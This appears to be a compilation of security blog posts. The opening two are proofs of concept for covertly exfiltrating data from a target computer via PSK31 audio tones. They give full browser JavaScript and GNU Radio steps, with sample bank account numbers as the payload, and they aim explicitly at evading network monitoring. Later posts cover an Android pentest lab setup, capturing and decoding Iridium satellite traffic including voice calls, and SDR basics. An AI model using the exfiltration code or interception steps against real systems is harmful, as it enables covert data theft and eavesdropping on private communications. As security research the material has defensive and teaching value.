Data exfiltration via PSK31 without GNU Radio

Using PSK31 to exfil data – a very basic proof of concept

Purpose
To exfiltrate data from a target computer without using any wired or wireless network which could be caught by network monitoring.

This example transmits over an audio card and receives with a microphone, so no additional radio hardware is required.

The aim is to reduce the amount of software installs needed, so GNU Radio is not used here.

Caveats
Please note this is just a basic proof of concept and further work is required to clean out some of the noise.

Hardware
Target computer where data needs to be extracted from.
Raspberry pi 3 with Raspbian installed and a 4G usb dongle for sending out the data.
A USB mini microphone for listening to incoming data on the raspberry pi.
A $5 mini USB microphone was used here:

Software
Transmiting computer with ability to execute JavaScript.
Receiving raspberry pi with fldigi program installed.

PSK31 Protocol
PSK31 is a Phase Shift Keying protocol often used by ham radio operators to send text messages over the air and has a data rate very close to typing speed. ASCII letters and numbers are encoded using a varicode, where a space is represented by 00. No character contains more than one 0 in a row.

JavaScript on transmitter and fldigi on receiver

This option removes the need for GNU Radio by using the fldigi program on the receiver and JavaScript on the transmitter.

Receiving computer (raspberry pi) configuration

Install raspbian e.g. dd the image onto an 8Gb sdcard [1].
Change the default passwords for pi & root users.

Configure the USB microphone
Add these libraries to the GR_BLOCKS_PATH environment variable.
For example, adding to ~/.profile:
GRC_BLOCKS_PATH="/home/sdr/grc-3rdparty-libs/gr-psk31-master/python"
Logout and back in again.

Next, plug in the USB mini microphone and test that it works:
$ arecord -l

Note: this records for 3 secs, make some test noises
$ arecord -D plughw:1,0 -d 3.0 test.wav
$ aplay test.wav

Next adjust the gain on the microphone
“Preferences”->”Audio Device Settings”. Select “USB PnP Sound Device (Alsa mixer)” from dropdown. Choose “Select Controls” and check the “Microphone” box and adjust the gain.

Install fldigi on raspberry pi receiver
$ sudo apt-get install fldigi

Run fldigi and click through the setup wizard (skip through the options).

Open fldigi menu item “Configure” -> “Soundcard”.

In the “Audio” tab, check the box for “PortAudio” and set “Capture” to “USB PnP Sound Device: Audio (hw:1,0)” (or whatever your microphone device number is). Also set “Playback” to default.

Running fldigi on the raspberry pi receiver
Select menu option “Op Mode” -> “PSK” -> “BPSK-31”.
Set frequency in frequency window to your chosen frequency e.g. 2000 Hz.

If the waterfall window is not showing, just open system audio settings and make sure the microphone is set to record using the red button. Raspbian menu -> “Preferences” -> “Audio Device Settings” -> select “USB PnP Sound Device (Alsa mixer)” -> check the red button on the microphone.

Transmitting computer configuration

Running the JavaScript PSK31 transmitter on the target
The following JavaScript code provides a great standalone option to send data via the target’s browser without the need to install additional tools.

https://github.com/jacobwgillespie/psk31

To make the dependencies easier for the target, the following file modifications are needed:

Create an index.html to include all the dependencies required by app.js. The contents of index.html:

<html> 
<script src="varicode.js">
</script> <script src="utils.js">
</script> <script src="psk.js">
</script> <script src="app.js">
</script> 
</html>

Remove the import and export keywords from the individual files.
The contents of app.js should now be:

const ENERGY_PER_BIT = 100;
const CARRIER_FREQUENCY = 2000;
const BPSK31_SAMPLE_RATE = 44100;
const BAUD_RATE = 31.25;
const HALF_BAUD_RATE = BAUD_RATE / 2;
const BIT_DURATION = BPSK31_SAMPLE_RATE / BAUD_RATE;
const PAYLOAD = 'bank account number: 12121212 bsb: 123456; bank account number: 13131313 bsb: 123456; bank account number: 14141414 bsb: 123456; bank account number: 15151515 bsb: 123456; bank account number: 16161616 bsb: 123456; bank account number: 17171717 bsb: 123456;';

const PAYLOAD_BITS = messageToBits(PAYLOAD);
const PAYLOAD_PHASES = bitsToPhases(PAYLOAD_BITS);
const PAYLOAD_AMPLITUDE_MODE = phasesToAmp(PAYLOAD_PHASES);

const HALF_PI = Math.PI / 2;

const bpsk31 = buildBinaryPhaseShiftKeyingOscillator(
  ENERGY_PER_BIT, BIT_DURATION, CARRIER_FREQUENCY
);

const app = (ctx) => {
  let startTime;

  // const ctx = new AudioContext(1, 0, BPSK31_SAMPLE_RATE);

  const spn = ctx.createScriptProcessor(16384, 1, 1);
  spn.onaudioprocess = (audioProcessingEvent) => {
    const outputData = audioProcessingEvent.outputBuffer.getChannelData(0);
    let currentPhase = 0;
    startTime = startTime || audioProcessingEvent.playbackTime;
    for (let sample = 0; sample < outputData.length; sample += 1) {
      const time = (audioProcessingEvent.playbackTime - startTime) + (sample / ctx.sampleRate);

      const frame = Math.floor(time * 1000 / HALF_BAUD_RATE);
      const progress = (time * 1000 % HALF_BAUD_RATE) / HALF_BAUD_RATE;

      const currentPhase = PAYLOAD_PHASES[frame];
      const ampMode = PAYLOAD_AMPLITUDE_MODE[frame];

      let ampModifier;
      switch (ampMode) {
        case 1:
          ampModifier = Math.cos(2 * Math.PI + Math.PI / 2 * progress);
          break;

        case 2:
          ampModifier = Math.cos(3/2 * Math.PI + Math.PI / 2 * progress);
          break;

        default:
          ampModifier = 1;
      }

      const result = bpsk31(time, currentPhase, ampModifier);
      outputData[sample] = result;
    }
  };

  spn.connect(ctx.destination);
};

const ctx = new AudioContext(); //(1, 0, BPSK31_SAMPLE_RATE);
app(ctx);

The contents of psk.js should now be:

// Parameter names come from the equation for BPSK here:
// https://en.m.wikipedia.org/wiki/Phase-shift_keying#Binary_phase-shift_keying_.28BPSK.29

const binaryPhaseShiftKeyingOscillator = (t, a, carrierFrequency, bit, ampModifier) =>
  ampModifier * a * Math.cos((2 * Math.PI * carrierFrequency * t) + (Math.PI * (1 - bit)));

const buildBinaryPhaseShiftKeyingOscillator = (
  energyPerBit,
  symbolDuration,
  carrierFrequency
) => {
  const a = Math.sqrt(2 * (energyPerBit / symbolDuration));
  return (t, bit, ampModifier) =>
    binaryPhaseShiftKeyingOscillator(t, a, carrierFrequency, bit, ampModifier);
};

The contents of utils.js should now be:

const messageToBits = message =>
  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0].concat(message.split('').reduce(
    (bits, character) => bits.concat(VARICODE[character] || []).concat([0, 0]),
    []
  )).concat([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]);

const bitsToPhases = (bits) => {
  const phases = [0, 1, 1, 0, 0, 1]; // 000
  bits.forEach((bit) => {
    const previousPhase = phases[phases.length - 1];
    const differentPhase = previousPhase === 0 ? 1 : 0;
    if (bit === 1) {
      phases.push(previousPhase);
      phases.push(previousPhase);
    } else {
      phases.push(previousPhase);
      phases.push(differentPhase);
    }
  });

  return phases;
};

const phasesToAmp = (phases) => {
  const amp = [];

  for (let i = 0; i < phases.length - 1; i += 2) {
    const first = phases[i];
    const second = phases[i + 1];

    if (first !== second) {
      amp.push(1);
      amp.push(2);
    } else {
      amp.push(0);
      amp.push(0);
    }
  }

  return amp;
};

The contents of varicode.js should now be:

const VARICODE = {
  '\x00': 1010101011, // NUL
  '\x01': 1011011011, // SOH
  '\x02': 1011101101, // STX
  '\x03': 1101110111, // ETX
  '\x04': 1011101011, // EOT
  '\x05': 1101011111, // ENQ
  '\x06': 1011101111, // ACK
  '\x07': 1011111101, // BEL
  '\x08': 1011111111, // BS
  '\x09': 11101111, // HT
  '\x0a': 11101, // LF
  '\x0b': 1101101111, // VT
  '\x0c': 1011011101, // FF
  '\x0d': 11111, // CR
  '\x0e': 1101110101, // SO
  '\x0f': 1110101011, // SI
  '\x10': 1011110111, // DLE
  '\x11': 1011110101, // DC1
  '\x12': 1110101101, // DC2
  '\x13': 1110101111, // DC3
  '\x14': 1101011011, // DC4
  '\x15': 1101101011, // NAK
  '\x16': 1101101101, // SYN
  '\x17': 1101010111, // ETB
  '\x18': 1101111011, // CAN
  '\x19': 1101111101, // EM
  '\x1a': 1110110111, // SUB
  '\x1b': 1101010101, // ESC
  '\x1c': 1101011101, // FS
  '\x1d': 1110111011, // GS
  '\x1e': 1011111011, // RS
  '\x1f': 1101111111, // US
  ' ': 1,
  '!': 111111111,
  '"': 101011111,
  '#': 111110101,
  $: 111011011,
  '%': 1011010101,
  '&': 1010111011,
  "'": 101111111,
  '(': 11111011,
  ')': 11110111,
  '*': 101101111,
  '+': 111011111,
  ',': 1110101,
  '-': 110101,
  '.': 1010111,
  '/': 110101111,
  0: 10110111,
  1: 10111101,
  2: 11101101,
  3: 11111111,
  4: 101110111,
  5: 101011011,
  6: 101101011,
  7: 110101101,
  8: 110101011,
  9: 110110111,
  ':': 11110101,
  ';': 110111101,
  '': 111010111,
  '?': 1010101111,
  '@': 1010111101,
  A: 1111101,
  B: 11101011,
  C: 10101101,
  D: 10110101,
  E: 1110111,
  F: 11011011,
  G: 11111101,
  H: 101010101,
  I: 1111111,
  J: 111111101,
  K: 101111101,
  L: 11010111,
  M: 10111011,
  N: 11011101,
  O: 10101011,
  P: 11010101,
  Q: 111011101,
  R: 10101111,
  S: 1101111,
  T: 1101101,
  U: 101010111,
  V: 110110101,
  W: 101011101,
  X: 101110101,
  Y: 101111011,
  Z: 1010101101,
  '[': 111110111,
  '\\': 111101111,
  ']': 111111011,
  '^': 1010111111,
  _: 101101101,
  '`': 1011011111,
  a: 1011,
  b: 1011111,
  c: 101111,
  d: 101101,
  e: 11,
  f: 111101,
  g: 1011011,
  h: 101011,
  i: 1101,
  j: 111101011,
  k: 10111111,
  l: 11011,
  m: 111011,
  n: 1111,
  o: 111,
  p: 111111,
  q: 110111111,
  r: 10101,
  s: 10111,
  t: 101,
  u: 110111,
  v: 1111011,
  w: 1101011,
  x: 11011111,
  y: 1011101,
  z: 111010101,
  '{': 1010110111,
  '|': 110111011,
  '}': 1010110101,
  '~': 1011010111,
  '\x7F': 1110110101, // DEL
};

Object.keys(VARICODE).forEach((character) => {
  VARICODE[character] = VARICODE[character].toString(10).split('').map(c => parseInt(c, 10));
});

Next, once you have configured the frequency and the message (PAYLOAD variable) you wish to send in app.js, launch the index.html and set the volume to about half way.

You should now see the message being received by fldigi on the raspberry pi.

Transmitting the data from the target
Click on the index.html file to transmit the message.

Receiving the data on the raspberry pi
The fldigi tool listens on multiple channels and displays the receiving text on the left hand side.

Notes
Other devices could be used instead of a raspberry pi e.g. the spy devices with a sim which call a number to send the audio to when it hears audio in the room.

Web Bluetooth would also be an interesting option to explore.

Work still remains to clean up the signal and reduce the noise, especially when using the cheap USB microphones.

References
[1] https://www.raspberrypi.org/documentation/installation/installing-images/
[2] JavaScript code for sending PSK31 data
[3] Fast Light Digital modem application (fldigi)

Data exfiltration via PSK31 with GNU Radio

Using PSK31 to exfil data – a very basic proof of concept

Purpose
To exfiltrate data from a target computer without using any wired or wireless network which could be caught by network monitoring.

This example uses GNU Radio to transmit over an audio card and receive with a microphone, so no additional radio hardware is required.

Caveats
Please note this is just a basic proof of concept and further work is required to clean out some of the noise.

Hardware
Target computer where data needs to be extracted from.
Raspberry pi 3 with Raspbian installed and a 4G usb dongle for sending out the data.
A USB mini microphone for listening to incoming data on the raspberry pi.
A $5 mini USB microphone was used here:

Software
Transmiting computer with gnuradio installed or just ability to execute javascript.
Receiving raspberry pi with raspbian and gnuradio installed.

PSK31 Protocol
PSK31 is a Phase Shift Keying protocol often used by ham radio operators to send text messages over the air and has a data rate very close to typing speed. ASCII letters and numbers are encoded using a varicode, where a space is represented by 00. No character contains more than one 0 in a row.

Gnuradio on both sides

Receiving computer (raspberry pi) configuration

Install raspbian e.g. dd the image onto an 8Gb sdcard [1].
Change the default passwords for pi & root users.

Install GNU Radio
To install gnu-radio use the following commands:
$ sudo apt-get update
$ sudo apt-get install gnuradio
$ sudo apt-get install gnuradio-dev
$ sudo apt-get install libboost1.55-all-dev
$ sudo apt-get install libcppunit-1.13-0
$ sudo apt-get install libcppunit-dev
$ sudo apt-get install doxygen
$ sudo ldconfig

Install PSK31 graphs
Download and build the PSK31 gnuradio companion graphs from https://github.com/tkuester/gr-psk31 to your project directory
$ cd /home/pi/psk31/gr-psk31-master
$ mkdir build
$ cd build
$ cmake ../
$ make
$ sudo make install
$ sudo ldconfig

Configure the USB microphone
Add these libraries to the GR_BLOCKS_PATH environment variable.
For example, adding to ~/.profile:
GRC_BLOCKS_PATH="/home/sdr/grc-3rdparty-libs/gr-psk31-master/python"
Logout and back in again.

Next, plug in the USB mini microphone and test that it works:
$ arecord -l

Note: this records for 3 secs, make some test noises
$ arecord -D plughw:1,0 -d 3.0 test.wav
$ aplay test.wav

Next adjust the gain on the microphone
“Preferences”->”Audio Device Settings”. Select “USB PnP Sound Device (Alsa mixer)” from dropdown. Choose “Select Controls” and check the “Microphone” box and adjust the gain.

Modify the PSK31 receive graph
Perform the following modifications to the transmit psk gnuradio-companion graph “psk31_rx.grc”:

Replace the “Wav File Source” block with an “Audio Source” block.

Set the “Device Name” parameter within the “Audio Source” block to match your USB microphone address: e.g. to “plughw:1,0”

If this value does not match a valid audio input, the following error will appear when trying the run the graph:
"audio_alsa_source0 - [default]: No such file or directory"

In the “QT GUI Range” block for the “tune_freq” variable, change the “Default Value” to 2000 (or whichever frequency you choose for your situation).

Transmitting computer configuration

This computer will be sending the exfiltrated data to the raspberry pi.

Install GNU Radio
Install gnuradio, e.g. for Ubuntu (for Windows see [2]):
$ sudo apt-get update
$ sudo apt-get install gnuradio
$ sudo apt-get install gnuradio-dev
$ sudo apt-get install python-pkgconfig

Install PSK31 graphs
Download and build the PSK31 gnuradio companion graphs from https://github.com/tkuester/gr-psk31 to /home/pi/psk31
$ cd /home/pi/psk31/gr-psk31-master
$ mkdir build
$ cd build
$ cmake ../
$ make
$ sudo make install
$ sudo ldconfig

Add these libraries to the GR_BLOCKS_PATH environment variable
e.g. for ~/.profile:
GRC_BLOCKS_PATH="/home/sdr/grc-3rdparty-libs/gr-psk31-master/python"
Logout and back in again.

Modify the PSK31 transmit graph
Perform the following modifications to the transmit psk gnuradio-companion graph “psk31_tx.grc”:

In the “QT GUI Range” block for the “tx_freq” variable, change the “Default Value” to 2000 (or whichever frequency you choose for your situation).

Testing transmit and receive
Type in the test message you wish to send in psk31_tx.grc “Vector Source” block as the second parameter within the map variable. For example:

map(ord, 'bank account number: 12121212 bsb: 123456; bank account number: 13131313 bsb: 123456; bank account number: 14141414 bsb: 123456; bank account number: 15151515 bsb: 123456; bank account number: 16161616 bsb: 123456; bank account number: 17171717 bsb: 123456; \n')

Run the psk31_tx.grc graph on the target computer using gnuradio-companion.

Next, run the psk31_rx.grc graph on the raspberry pi computer using gnuradio-companion.

It should be noted that this receive graph is susceptible to noise, experiment with the correct tuning frequency for your hardware, but it should be somewhere around 2000Hz.

Transmitting the data from the target

Receiving the data on the raspberry pi
The incoming (noisy) text is shown in the bottom panel:

Notes
For demonstration here, the host computer is Linux but gnuradio also installs on Windows [2].

All gnuradio-companion graphs can be exported to standalone python code without the need to launch the gnuradio-companion user interface.

It is also possible to generate the PSK31 waveforms using a scripting language without the gnuradio libraries and removing the need to install gnuradio on the host.

Other devices could be used instead of a raspberry pi e.g. the spy devices with a sim which call a number to send the audio to when it hears audio in the room.

Work still remains to clean up the signal and reduce the noise, espcially when using the cheap USB microphones.

References
[1] https://www.raspberrypi.org/documentation/installation/installing-images/
[2] http://gnuradio.org/redmine/projects/gnuradio/wiki/WindowsInstall
[3] https://github.com/tkuester/gr-psk31

Android Testing Environment Cheatsheet (Part 2)

This part will cover installing Android testing tools on the Kali VM and their basic usage.

Configuring Burp

Burp is already installed on the Kali VM. The following changes are needed:

Configure Burp on Kali
Choose the Proxy -> Options tab.
Choose Edit
In the Binding tab, select listen on all interfaces (or the address of Kali VM vbox network)

Configure proxy settings in Genymotion
Choose Settings -> Wi-Fi.
Hold down WiredSSID and choose Modify.
In Advanced Options, choose Manual proxy.
Enter the Kali VM address for the Proxy hostname e.g. 192.168.56.101.
Enter Burp’s port number for the Proxy port e.g. 8080.

Install Burp’s cert in Genymotion
Install Chrome e.g. $ sudo apt-get install chromium
In the Kali VM Chrome browser: Settings -> Network -> Network proxy.
Add 127.0.0.1, port 8080 in for the Manual proxy settings.
If your burp is not listening on all interfaces, change your burp listener to listen on 127.0.0.1 temporarily.
Visit http://burp.
Download the portswigger cert from the CA Certificate link.
Rename the downloaded cert to cacert.cer.

Copy the cert onto Genymotion’s sdcard:
Connect to Genymotion using adb as shown in Part 1, then:
$ adb push cacert.cer /sdcard/cacert.cer

In Genymotion, Settings -> Security -> Install from SD card.
Choose the cacert.cer at the bottom of the list and install.
Name the cert portswigger.

Finally, if your burp is not listening on all interfaces, change your burp listener back to listen on the address of your Kali VM vbox network.

Test your setup by visiting a web page in Genymotion and verifying that the traffic can be seen in Burp on the Kali VM.

Obtaining and installing android apps for testing

Install a plugin for chrome which allows downloading of APKs from the Google Play store e.g. APK Downloader Appsofto
Create a test google account for logging into the play store.
When visiting the play store, just click on the app’s icon and paste in the name of the package to download.
Of course, make sure to download apps which are compatible with your target Genymotion device.

Installing an APK onto Genymotion
To install your downloaded APK from the app store onto Genymotion, run the following command in the Kali VM:
$ adb install appname.apk

The installed app should now be in the Genymotion menu.

Install testing tools on Kali VM

Install Chrome browser
$ sudo apt-get install chromium

Install Drozer
Download Drozer.
Download drozer.apk agent.

Install Drozer server on Kali VM:
$ sudo apt-get install python-protobuf
$ sudo apt-get -f install (to install deps for python-protobuf)
$ sudo dpkg -i drozer.deb

Install Drozer agent on GenyMotion:
Connect to Genymotion using adb as shown in Part 1, then:
$ adb install drozer.apk

In Genymotion:
Open the drozer agent app on Genymotion and turn ON the server.

In Kali:
$ adb forward tcp:31415 tcp:31415
$ drozer console connect

Install APKtool
Download the apktool.
Download the apktool wrapper.
$ mv apktool-ver-number.jar apktool.jar
$ sudo cp apktool.jar /usr/local/bin
$ sudo cp apktool /usr/local/bin
$ sudo chmod u+x /usr/local/bin/apktool*

You should now be able to run the apktool against your target APK and browse the resulting directory to review the manifest file etc:
$ apktool d appname.apk

Install dex2jar
dex2jar: convert an APK file into a JAR file.

Download dex2jar.
Unzip and add the dex2jar script to your PATH/.profile:
$ unzip dex2jar-ver-num.zip
$ PATH="$PATH:/home/android/tools/dex2jar-ver-num/"

You should now be able to run the dex2jar tool against your target APK to create a jar file for browsing with jd-gui tool.
$ dex2jar-ver-num appname.apk

Install jd-gui
jd-ui: browse a JAR file and save source files as .java.

Download the jd-gui jar file.
Create a file name jd-gui with the following command tailored for your location:
java -jar /home/android/tools/jd-ui-ver-num.jar

Make the file executable and add to your PATH/.profile:
$ chmod u+x jd-gui
$ PATH="$PATH:/home/android/tools/"

You should now be able to run the jd-gui tool and open your newly created jar file from dex2jar, and browse the reconstructed Java source:
$ jd-gui

Install jdax
jdax: converts an APK file into Java source code (also useful if dex2jar doesn’t work).

Download jadx and unzip.
Add to your PATH/.profile:
$ PATH="$PATH:/home/android/tools/jadx-vernum/bin/"

Run jadx-gui and select your target APK or JAR file to browse:
$ jadx-gui

Install FindBugs & FindSecurityBugs
These plugins will work with Android Studio and can be used to scan source code for potential security issues.

Install FindBug:
Open Android Studio, File -> Settings -> Plugins.
Search for “FindBugs”, install and restart Android Studio.

Install FindSecurityBugs:
Download FindSecurityBugs plugin for Android Studio.
In Android Studio, File -> Settings -> Plugins -> Install plugin form disk.
Select the plugin zip file and restart Android Studio.

Android Testing Environment Cheatsheet (Part 1)

Environment

Genymotion and Android emulators cannot run within a VM.
Instead, this setup can help contain all the tools you need:
– Install Genymotion on your host OS.
– Install your android tools on a Kali VM to keep it portable.
– Connect to your android apps running in Genymotion from the Kali VM.

Note:
– Using an Ubuntu host here.
– Using Virtualbox here to create Kali VM but could be any VM platform.
– Genymotion requires Virtualbox to be installed for its emulation.
– Genymotion must be run natively on your host.
– If you prefer not to use a VM to store all your tools, just install everything on your host instead.

Configure the Kali VM

Install Virtualbox:
$ sudo apt-get install virtualbox

For the following steps, it is assumed Kali is installed in a Virtualbox VM. Tip: pressing the right control keyboard button releases your mouse from Virtualbox.

Install Virtualbox guest addons
apt-get update
apt-get install -y virtualbox-guest-x11
reboot

Create android test user
useradd -m android
passwd android
usermod -a -G sudo android
chsh -s /bin/bash android
logout

Install Android Studio
Download from android.com.
Unpack:
unzip android-studio-ide-*.zip
Run first time to install:
~/tools/android-studio/bin/studio.sh

Add Android Studio to your PATH/.profile:
$ PATH="$PATH:/home/android/tools/android-studio

Note: The command line android SDK tools (e.g. adb) are stored in:
~/Android/Sdk/platform-tools

Add Android SDK tools to your PATH/.profile:
$PATH="$PATH:/home/android/Android/Sdk/tools/:/home/android/Android/Sdk/platform-tools/:/home/android/Android/Sdk/build-tools/2.4.0.3/"

Configure network interfaces
In the Virtualbox network settings for the Kali VM, for Adapter 1, choose Host-only Adapter (vboxnet0).
This will allow the VM and the Genymotion VM to talk to each other over ADB.
In the same network settings window, enable Adapter 2 for NAT
Adapter 1 will allow connections to Genymotion, while Adapter 2 will allow internet.
Reboot the Kali VM and run
$ sudo ifconfig
If the second adapter does not have an IP address run:
$ dhclient -r eth1
$ dhclient eth1

You should now have an internet connection on your Kali VM.

Install Genymotion on host

Create a Genymotion account at genymotion.com.
Download Genymotion.
If your host is Windows, download Genymotion & Virtualbox as a package.
If your host is Linux/Mac, ensure you have Virtualbox installed already.

Install Genymotion
chmod u+x genymotion-*.bin
./genymotion-2.8.0-linux_x64.bin
The installer will ask you to setup a virtual device.
Sign in using your created Genymotion account to complete this step.
Select your target device e.g. Google Nexus 4.
Once the download has completed and installed, the new virtual device will be listed.

Configuring Genymotion

In Genymotion Settings, ADB tab, deselect the Genymotion Android tools (default), just choose custom Android SDR tools and leave it blank (this avoids the device is “offline” errors when connecting with adb from a VM).
Choose Start to launch the virtual device.
The network settings for Genymotion can be left as default (these are configured in the Virtualbox settings rather than in the Genymotion settings and should be left as Host-only Adapter vboxnet0).
In the same network settings window, enable Adapter 2 for NAT
Adapter 1 will allow connections from the Kali VM, while Adapter 2 will allow internet in Genymotion.
If you have Virtualbox installed on your host the device should start.
Click “No” for the question “Do you want to specify the Android SDK location?”.

Connecting to Genymotion

Here, we will connect to Genymotion from our Kali VM:
$ adb devices
$ adb connect 192.168.56.101 (the IP of your Genymotion emulator, when you mouse over it it should be in title of the window)
$ adb devices (should now see the listed connected device)
$ adb shell

Now your Kali VM is ready to install all the essential android testing tools and can connect to a Genymotion emulator. Having all your android testing tools in a VM allows moving of the VM to different computers, backing up and can save lots of setup time.

Listening to Iridium satellite traffic on Ubuntu (16.04 LTS)

Software
Download gr-iridium.
Download iridium-toolkit.

Hardware
RTLSDR/HackRF (using HackRF here).
A L-band patch antenna (using outernet’s antenna here).
A low noise amplifier allowing frequencies 1.616 – 1.6265 GHz (ideal but optional to perform initial tests).
A modified GPS antenna can also be used instead.
For a full list of hardware options please refer to CCC.

Target Frequencies
1.616 – 1.6265 GHz (L-band).
The outernet LNA does not fit this band but can be modified.
To get going quickly with rough results, it is still possible to receive messages without any filter.

Installing gr-iridium
Assuming GNU Radio and HackRF are already installed.
Download gr-iridium.
Install with the following commands:
$ mkdir build
$ cd build
$ cmake ..
$ make
$ sudo make install
$ sudo ldconfig

There should now be iridium blocks available in GNU Radio Companion.
The command line tool iridium-extractor should also be available.

Installing iridium-toolkit
Download iridium-toolkit.
No installation needed, just extract the zip file.

Listening to Iridium signals
Within the gr-iridium directory, the following command can be used:
(if using a RTLSDR, then use the rtl-sdr.conf file instead)
$ iridium-extractor -D 4 examples/hackrf.conf | grep "A:OK" > output.bit

Output should look something like:
osmosdr 0.1.4 (0.1.4) gnuradio 3.7.9
built-in source types: file osmosdr fcd rtl rtl_tcp uhd miri hackrf bladerf rfspace airspy redpitaya
Using HackRF One with firmware git-44df9d1
(RF) Gain: 14.0 (Requested 10)
BB Gain: 20.0 (Requested 20)
IF Gain: 40.0 (Requested 40)
Bandwidth: 10000000.0 (Requested 10000000)
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO1476513419 | i: 0/s | i_avg: 0/s | q: 0 | q_max: 0 | o: 0/s | ok: 0% | ok: 0/s | ok_avg: 0% | ok: 0 | ok_avg: 0/s | d: 0
OO1476513420 | i: 5/s | i_avg: 2/s | q: 0 | q_max: 3 | o: 5/s | ok: 83% | ok: 4/s | ok_avg: 83% | ok: 5 | ok_avg: 2/s | d: 0
1476513421 | i: 12/s | i_avg: 6/s | q: 0 | q_max: 2 | o: 12/s | ok: 84% | ok: 10/s | ok_avg: 84% | ok: 16 | ok_avg: 5/s | d: 0
1476513422 | i: 14/s | i_avg: 8/s | q: 0 | q_max: 2 | o: 14/s | ok: 100% | ok: 14/s | ok_avg: 91% | ok: 31 | ok_avg: 7/s | d: 0
1476513423 | i: 16/s | i_avg: 10/s | q: 0 | q_max: 3 | o: 16/s | ok: 88% | ok: 14/s | ok_avg: 90% | ok: 46 | ok_avg: 9/s | d: 0
1476513424 | i: 19/s | i_avg: 11/s | q: 0 | q_max: 3 | o: 19/s | ok: 70% | ok: 13/s | ok_avg: 84% | ok: 60 | ok_avg: 9/s | d: 0
1476513425 | i: 20/s | i_avg: 13/s | q: 0 | q_max: 3 | o: 20/s | ok: 80% | ok: 16/s | ok_avg: 83% | ok: 77 | ok_avg: 10/s | d: 0
...

Next, look at the captured traffic in the output.bit file:
$ tail -f output.bit

The output should look something like:
RAW: i-1476565594-t1 0009152 1626448000 A:OK I:00000000041 98% 0.009 132 001100000011000011110011001100111111001100110011111100110000101000011111
01000001001000010000000010100010100001001100011000000000000000000000000000000000000000000000000000000000000000001100110011001100110011001100110011
0011001100110011001100110011001001011110101101101100110011111111100001
RAW: i-1476565594-t1 0014822 1626280832 A:OK I:00000000045 86% 0.003 86 001100000011000011110011100000101001110001111111010001010110000010101111
1010010010110010011111010010001000000001101111100100100010001100100001100011010100110001100000000001000011100000111111111111
RAW: i-1476565594-t1 0019142 1626280448 A:OK I:00000000055 90% 0.004 140 001100000011000011110011100101001011100100001111011010010111001110101000
10101000011100110111001110110000000000001000001001010000011000000110001000100000001100001000010010100110101011001111111111111111111111111111111111
11111111111111111111111111111110010111101011011011001100111101000000100010001001000001
RAW: i-1476565594-t1 0020032 1621280384 A:OK I:00000000067 82% 0.003 179 001100000011000011110011000100011011001100000010001000000111001101100001
00010101110101001100110001010101010011010100110101010101010101010101010101010101010101010101010101010101010101010101110001001101010101010101010101
01010101010101010101010101010111000011010101010101010101010101010101010101110001010101010101010101010101010101010101010101010101010101010101010101
010101011100010101

Decoding Iridium signals
Within the iridium-toolkit directory, the following command can be used:
$ python iridium-parser.py output.bit > output.parsed

The output should look something like:
IRA: i-1476565594-t1 000053431 1626276608 81% 0.004 131 DL sat:80 beam:28 pos=(-43.58/+139.10) alt=804 RAI:48 ?10 bc_sb:07 PAGE(tmsi:38018671 msc_id:01) descr_extra:11101011010111100111001100111110100110
IRA: i-1476565594-t1 000054512 1626276480 95% 0.005 110 DL sat:80 beam:31 pos=(-43.51/+139.09) alt=803 RAI:48 ?10 bc_sb:12 PAGE(NONE) descr_extra:011010110101111001110011001111011011100000000000000110010011
IBC: i-1476565594-t1 000059452 1619859200 86% 0.004 137 DL bc:0 sat:80 cell:31 0 ts:1 sv_blkn:0 aq_cl:1111111111111111 aq_sb:12 aq_ch:0 00 0000 time:2016-10-16T08:07:36Z descr_extra:101110001100
IBC: i-1476565594-t1 000059632 1619859072 90% 0.004 143 DL bc:0 sat:80 cell:31 0 ts:1 sv_blkn:0 aq_cl:1111111111111111 aq_sb:12 aq_ch:0 00 101110100011111111111111110000 max_uplink_pwr:31 descr_extra:011110010111010100111101
IBC: i-1476565594-t1 000059812 1619858944 94% 0.004 137 DL bc:0 sat:80 cell:31 0 ts:1 sv_blkn:0 aq_cl:1111111111111111 aq_sb:12 aq_ch:0 00 0000 tmsi_expiry:284264056 descr_extra:001101000111
IBC: i-1476565594-t1 000059992 1619859072 87% 0.004 138 DL bc:0 sat:80 cell:31 0 ts:1 sv_blkn:0 aq_cl:1111111111111111 aq_sb:12 aq_ch:0 00 0000 time:2016-10-16T08:07:37Z descr_extra:00001100011001
IBC: i-1476565594-t1 000060172 1619858944 92% 0.004 139 DL bc:0 sat:80 cell:31 0 ts:1 sv_blkn:0 aq_cl:1111111111111111 aq_sb:12 aq_ch:0 00 101110100011111111111111110000 max_uplink_pwr:31 descr_extra:1111000101010101
IBC: i-1476565594-t1 000060352 1619858944 90% 0.004 142 DL bc:0 sat:80 cell:31 0 ts:1 sv_blkn:0 aq_cl:1111111111111111 aq_sb:12 aq_ch:0 00 0000 tmsi_expiry:284264056 descr_extra:0101001110110011010100
...

To visualise the types of messages captured:
$ python stats.py output.parsed

To check if your data contains voice calls:
$ python stats-voc.py output.parsed

Select the samples and play-iridium-ambe will decode and play the calls.

How to get started with Software Defined Radio (SDR)

Hardware
http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/
http://superkuh.com/rtlsdr.html
http://rtlsdr4everyone.blogspot.com.au/p/you-want-value-for-money-after-all.html

The cheapest way to get started is to buy a DVD USB dongle from ebay/amazon. Get one with a realtek chip and you should only need to pay around $10-$20 AUD e.g. search for “dvb dongle realtek” on ebay for your nearest seller.

Software
http://www.rtl-sdr.com/about-rtl-sdr/
http://gnuradio.org/
http://gqrx.dk/
http://airspy.com/ (Windows)

Installing on Linux
While there are lots of options and installation methods including GNU Radio Live, Pentoo and Skywave Linux etc. It is very easy to install on Ubuntu now. For a quick start, run the following commands on Ubuntu:

$ sudo apt-get update
$ sudo apt-get install gnuradio
$ sudo apt-get install gqrx-sdr

You can now plug in your RTLSDR dongle and try listening to a radio station using GQRX. Also try browsing around the other frequencies to see what you can hear.

Also check out:
http://www.rtl-sdr.com/rtl-sdr-quick-start-guide/
http://www.rtl-sdr.com/introduction-to-signal-analysis-baltimore-course-live-stream-and-recorded-videos/

Installing on Windows
SDRSharp is very popular on Windows (equivalent of GQRX on Linux), check out some installation instructions and tutorials here:
http://www.rtl-sdr.com/rtl-sdr-quick-start-guide/
http://www.rtl-sdr.com/big-list-rtl-sdr-supported-software/

Looking at Aircraft
https://www.hak5.org/episodes/hak5-1609
https://www.hak5.org/episodes/hak5-1613
